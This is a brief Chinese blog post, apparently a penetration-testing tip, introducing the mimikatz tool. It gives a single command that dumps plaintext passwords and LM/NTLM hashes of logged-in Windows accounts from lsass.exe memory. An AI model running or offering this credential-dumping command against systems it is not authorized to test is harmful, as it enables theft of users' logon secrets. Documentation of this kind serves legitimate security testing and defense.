mimikatz渗透测试中常用的工具,法国人GentilKiwi编写的一款windows平台下的轻量神器。他的功能也特别的多,最核心的在于可以直接从lsass.exe进程里获取windows处于active状态账号的明文密码。


命令:

mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
#获取本机用户名、口令、sid、LM hash、NTLM hash(命令实际为两条,可同行写)

正文到此结束

本文标题:mimikatz|抓取本机密码相关信息

本文链接:https://www.hantaosec.com/1630.html

除非另有说明,本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议

声明:转载请注明文章来源及链接,不带链接禁止任何转载!访问任何网络安全相关文章,则视为默认接受网络安全文章免责声明 ,请认真阅读。

© 本文为原创文章,允许规范转载
喜欢我的文章吗?
别忘了点赞或赞赏,让我知道创作的路上有你陪伴。